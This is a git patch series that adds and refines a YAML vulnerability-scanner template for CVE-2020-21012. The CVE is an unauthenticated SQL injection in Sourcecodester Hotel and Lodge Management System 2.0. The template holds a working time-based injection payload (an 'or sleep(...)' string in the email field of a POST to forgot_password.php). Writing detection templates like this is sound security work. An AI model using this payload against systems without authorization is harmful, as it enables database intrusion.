From c8a1eb5e7e2c33182237339bb21f40850265893c Mon Sep 17 00:00:00 2001 From: edoardottt Date: Fri, 30 Sep 2022 16:26:08 +0200 Subject: [PATCH 1/4] Add CVE-2020-21012 --- cves/2020/CVE-2020-21012.yaml | 33 +++++++++++++++++++++++++++++++++ 1 file changed, 33 insertions(+) create mode 100644 cves/2020/CVE-2020-21012.yaml diff --git a/cves/2020/CVE-2020-21012.yaml b/cves/2020/CVE-2020-21012.yaml new file mode 100644 index 0000000000..7d8b2e01e4 --- /dev/null +++ b/cves/2020/CVE-2020-21012.yaml @@ -0,0 +1,33 @@ +id: CVE-2020-21012 + +info: + name: Sourcecodester Hotel and Lodge Management System 2.0 - SQL Injection + author: edoardottt + severity: critical + description: | + Sourcecodester Hotel and Lodge Management System 2.0 is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. + reference: + - https://github.com/hitIer/web_test/tree/master/hotel + - https://nvd.nist.gov/vuln/detail/CVE-2020-21012 + classification: + cve-id: CVE-2020-21012 + tags: cve,sourcecodester,cve2020,sqli + +requests: + - raw: + - | + POST /forgot_password.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + + btn_forgot=1&email=1' or sleep(5)%23 + + matchers-condition: and + matchers: + - type: dsl + dsl: + - 'duration>=5' + + - type: status + status: + - 200 \ No newline at end of file From 89aeb451d88b426a5522855e81dac5ed678865cf Mon Sep 17 00:00:00 2001 From: vrenzolaverace Date: Sat, 1 Oct 2022 15:54:56 +0200 Subject: [PATCH 2/4] Update CVE-2020-21012.yaml --- cves/2020/CVE-2020-21012.yaml | 4 ++-- 1 file changed, 2 insertions(+), 2 deletions(-) diff --git a/cves/2020/CVE-2020-21012.yaml b/cves/2020/CVE-2020-21012.yaml index 7d8b2e01e4..551c9681ec 100644 --- a/cves/2020/CVE-2020-21012.yaml +++ b/cves/2020/CVE-2020-21012.yaml @@ -20,7 +20,7 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - btn_forgot=1&email=1' or sleep(5)%23 + btn_forgot=1&email=1%27%20or%20sleep(5)%23 matchers-condition: and matchers: @@ -30,4 +30,4 @@ requests: - type: status status: - - 200 \ No newline at end of file + - 200 From ea24fc5290d6c9f7a20e4efe856f4f83dd807fbc Mon Sep 17 00:00:00 2001 From: Ritik Chaddha <44563978+ritikchaddha@users.noreply.github.com> Date: Tue, 15 Nov 2022 16:45:00 +0530 Subject: [PATCH 3/4] Update CVE-2020-21012.yaml --- cves/2020/CVE-2020-21012.yaml | 17 +++++++++-------- 1 file changed, 9 insertions(+), 8 deletions(-) diff --git a/cves/2020/CVE-2020-21012.yaml b/cves/2020/CVE-2020-21012.yaml index 551c9681ec..4e6f9e372b 100644 --- a/cves/2020/CVE-2020-21012.yaml +++ b/cves/2020/CVE-2020-21012.yaml @@ -8,10 +8,13 @@ info: Sourcecodester Hotel and Lodge Management System 2.0 is vulnerable to unauthenticated SQL injection and can allow remote attackers to execute arbitrary SQL commands via the email parameter to the edit page for Customer, Room, Currency, Room Booking Details, or Tax Details. reference: - https://github.com/hitIer/web_test/tree/master/hotel + - https://www.sourcecodester.com/php/13707/hotel-and-lodge-management-system.html - https://nvd.nist.gov/vuln/detail/CVE-2020-21012 classification: cve-id: CVE-2020-21012 - tags: cve,sourcecodester,cve2020,sqli + metadata: + verified: true + tags: cve,cve2020,hotel,sqli requests: - raw: @@ -20,14 +23,12 @@ requests: Host: {{Hostname}} Content-Type: application/x-www-form-urlencoded - btn_forgot=1&email=1%27%20or%20sleep(5)%23 + btn_forgot=1&email=1%27%20or%20sleep(6)%23 - matchers-condition: and matchers: - type: dsl dsl: - - 'duration>=5' - - - type: status - status: - - 200 + - 'duration>=6' + - 'status_code == 200' + - 'contains(body, "Hotel Booking System")' + condition: and From cea1f4e75f5906b7dfca52697cfd6afd4f888f6f Mon Sep 17 00:00:00 2001 From: Prince Chaddha Date: Wed, 16 Nov 2022 14:06:26 +0530 Subject: [PATCH 4/4] Update CVE-2020-21012.yaml --- cves/2020/CVE-2020-21012.yaml | 2 +- 1 file changed, 1 insertion(+), 1 deletion(-) diff --git a/cves/2020/CVE-2020-21012.yaml b/cves/2020/CVE-2020-21012.yaml index 4e6f9e372b..e7e4ed73ba 100644 --- a/cves/2020/CVE-2020-21012.yaml +++ b/cves/2020/CVE-2020-21012.yaml @@ -14,7 +14,7 @@ info: cve-id: CVE-2020-21012 metadata: verified: true - tags: cve,cve2020,hotel,sqli + tags: cve,cve2020,hotel,sqli,unauth requests: - raw: